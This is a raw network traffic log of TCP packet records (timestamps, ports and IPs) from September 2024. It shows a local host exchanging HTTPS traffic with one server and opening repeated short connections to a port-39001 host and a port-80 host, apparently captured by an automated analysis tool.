Sep 19, 2024 02:25:21.708678007 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.708702087 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.708705902 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.708733082 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.708795071 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.708869934 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.708910942 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.708924055 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.708931923 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.708960056 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.708971977 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.709086895 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.709141970 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.709156036 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.709163904 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.709191084 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.709198952 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.776254892 CEST	39001	49718	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:21.794212103 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.794272900 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.794303894 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.794311047 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.794357061 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.794433117 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.794488907 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.794498920 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.794513941 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.794545889 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.794564962 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.794646025 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.794687033 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.794711113 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.794714928 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.794739008 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.794749975 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.794879913 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.794924974 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.794941902 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.794948101 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.794970989 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.794985056 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.795068026 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.795114040 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.795130014 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.795135975 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.795171022 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.795464993 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.795511961 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.795545101 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.795548916 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.795564890 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.795578957 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.795638084 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.795675993 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.795700073 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.795703888 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.795732975 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.795744896 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.795906067 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.795944929 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.795968056 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.795972109 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.795999050 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.796010971 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.880968094 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.880995035 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881052017 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881058931 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881086111 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881107092 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881223917 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881241083 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881269932 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881273985 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881294966 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881313086 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881429911 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881470919 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881490946 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881494999 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881526947 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881623030 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881655931 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881671906 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881690025 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881704092 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881726027 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881751060 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881833076 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881875992 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881899118 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881902933 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.881927967 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.881938934 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.882111073 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.882152081 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.882183075 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.882186890 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.882214069 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.882226944 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.882483959 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.882538080 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.882566929 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.882570982 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.882592916 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.882611036 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.882761002 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.882808924 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.882838011 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.882843018 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.882865906 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.882883072 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.891103029 CEST	49718	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:21.911295891 CEST	39001	49718	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:21.911926985 CEST	49718	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:21.917138100 CEST	39001	49718	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:21.917336941 CEST	49718	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:21.968112946 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.968135118 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.968179941 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.968187094 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.968202114 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.968234062 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.968261957 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.968508959 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.968559027 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.968569994 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.968583107 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.968607903 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.968756914 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.968801975 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.968812943 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.968830109 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.968857050 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.968982935 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.969022989 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.969038010 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.969062090 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.969089985 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.969233990 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.969276905 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.969297886 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.969306946 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.969336033 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.969460011 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.969496965 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.969531059 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.969537020 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.969561100 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.969614029 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.969659090 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.969661951 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.969681978 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.969717979 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:22.016980886 CEST	49719	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:22.021853924 CEST	39001	49719	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:22.021919966 CEST	49719	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:22.033293009 CEST	49719	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:22.038368940 CEST	39001	49719	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:22.038691998 CEST	49719	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:22.043461084 CEST	39001	49719	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:22.054838896 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:22.054860115 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:22.054902077 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:22.054908991 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:22.054955006 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:22.054996014 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:22.055015087 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:22.055053949 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:22.055058002 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:22.055077076 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:22.055108070 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:22.055166960 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:22.055190086 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:22.055192947 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:22.055216074 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:22.055269957 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:22.055325031 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:22.058727026 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:22.663666964 CEST	39001	49719	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:22.797743082 CEST	39001	49719	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:22.797792912 CEST	49719	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:22.798532009 CEST	49719	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:22.803563118 CEST	39001	49719	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:22.803608894 CEST	49719	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:22.908166885 CEST	49720	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:22.914307117 CEST	39001	49720	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:22.914378881 CEST	49720	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:22.943134069 CEST	49720	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:22.947973967 CEST	39001	49720	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:22.948039055 CEST	49720	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:22.952868938 CEST	39001	49720	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:23.554559946 CEST	39001	49720	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:23.641071081 CEST	49720	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:23.684699059 CEST	39001	49720	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:23.685801029 CEST	49720	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:23.691263914 CEST	39001	49720	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:23.691349030 CEST	49720	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:23.808643103 CEST	49722	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:23.813445091 CEST	39001	49722	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:23.816530943 CEST	49722	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:24.233326912 CEST	49722	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:24.238122940 CEST	39001	49722	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:24.238513947 CEST	49722	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:24.244080067 CEST	39001	49722	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:24.469237089 CEST	39001	49722	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:24.547323942 CEST	49722	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:24.616040945 CEST	39001	49722	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:24.616750002 CEST	49722	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:24.621761084 CEST	39001	49722	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:24.621850014 CEST	49722	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:24.720916986 CEST	49724	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:24.725826025 CEST	39001	49724	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:24.725903034 CEST	49724	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:25.095999956 CEST	49724	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:25.103578091 CEST	39001	49724	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:25.103625059 CEST	49724	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:25.109909058 CEST	39001	49724	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:25.371084929 CEST	39001	49724	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:25.500412941 CEST	49724	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:25.501619101 CEST	39001	49724	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:25.502346039 CEST	49724	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:25.507652044 CEST	39001	49724	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:25.507703066 CEST	49724	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:25.610858917 CEST	49727	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:25.830955029 CEST	39001	49727	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:25.831248999 CEST	49727	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:25.892791986 CEST	49727	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:25.897680044 CEST	39001	49727	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:25.897977114 CEST	49727	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:25.902772903 CEST	39001	49727	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:26.468995094 CEST	39001	49727	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:26.548058033 CEST	49727	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:26.601201057 CEST	39001	49727	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:26.750500917 CEST	49727	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:26.839998007 CEST	49727	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:26.914463997 CEST	39001	49727	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:26.914530993 CEST	49727	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:26.916953087 CEST	39001	49727	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:26.917094946 CEST	49727	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:27.142271996 CEST	49728	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:27.148184061 CEST	39001	49728	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:27.148273945 CEST	49728	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:27.946813107 CEST	49728	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:27.951713085 CEST	39001	49728	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:27.951777935 CEST	49728	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:27.956533909 CEST	39001	49728	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:28.042118073 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:25:28.048751116 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:25:28.049022913 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:25:28.049124956 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:25:28.053932905 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:25:28.363209963 CEST	39001	49728	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:28.363302946 CEST	49728	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:28.363451004 CEST	49728	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:28.370922089 CEST	39001	49728	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:28.480392933 CEST	49731	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:28.488259077 CEST	39001	49731	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:28.488353968 CEST	49731	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:28.519485950 CEST	49731	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:28.524446964 CEST	39001	49731	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:28.524513960 CEST	49731	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:28.529402018 CEST	39001	49731	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:28.681163073 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:25:28.891052961 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:25:28.891077042 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:25:28.891316891 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:25:29.149791002 CEST	39001	49731	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:29.150101900 CEST	49731	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:29.150350094 CEST	49731	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:29.155173063 CEST	39001	49731	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:29.271337986 CEST	49732	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:29.276318073 CEST	39001	49732	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:29.276381016 CEST	49732	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:30.380093098 CEST	49732	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:30.385164976 CEST	39001	49732	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:30.385221958 CEST	49732	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:30.390043974 CEST	39001	49732	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:30.769812107 CEST	39001	49732	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:30.769984007 CEST	49732	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:30.769984007 CEST	49732	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:30.774761915 CEST	39001	49732	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:30.876343012 CEST	49734	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:30.884484053 CEST	39001	49734	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:30.884593964 CEST	49734	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:30.896950960 CEST	49734	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:30.901730061 CEST	39001	49734	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:30.901782036 CEST	49734	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:30.906563997 CEST	39001	49734	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:31.522084951 CEST	39001	49734	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:31.522149086 CEST	49734	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:31.522291899 CEST	49734	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:31.527086020 CEST	39001	49734	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:31.626255035 CEST	49735	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:31.631236076 CEST	39001	49735	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:31.634064913 CEST	49735	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:31.645827055 CEST	49735	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:31.652919054 CEST	39001	49735	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:31.652972937 CEST	49735	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:31.657880068 CEST	39001	49735	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:32.286732912 CEST	39001	49735	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:32.286796093 CEST	49735	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:32.287009001 CEST	49735	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:32.291800976 CEST	39001	49735	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:32.392097950 CEST	49736	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:32.397145033 CEST	39001	49736	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:32.397222996 CEST	49736	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:32.410128117 CEST	49736	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:32.414872885 CEST	39001	49736	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:32.414928913 CEST	49736	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:32.419811010 CEST	39001	49736	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:33.016710997 CEST	39001	49736	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:33.016963959 CEST	49736	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:33.019453049 CEST	49736	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:33.024354935 CEST	39001	49736	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:33.126889944 CEST	49737	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:33.131828070 CEST	39001	49737	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:33.132882118 CEST	49737	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:33.146101952 CEST	49737	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:33.150904894 CEST	39001	49737	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:33.151190042 CEST	49737	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:33.155951977 CEST	39001	49737	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:33.784075975 CEST	39001	49737	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:33.784147978 CEST	49737	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:33.784255981 CEST	49737	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:33.789036036 CEST	39001	49737	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:33.892451048 CEST	49738	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:33.897697926 CEST	39001	49738	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:33.897777081 CEST	49738	39001	192.168.2.6	45.11.229.96
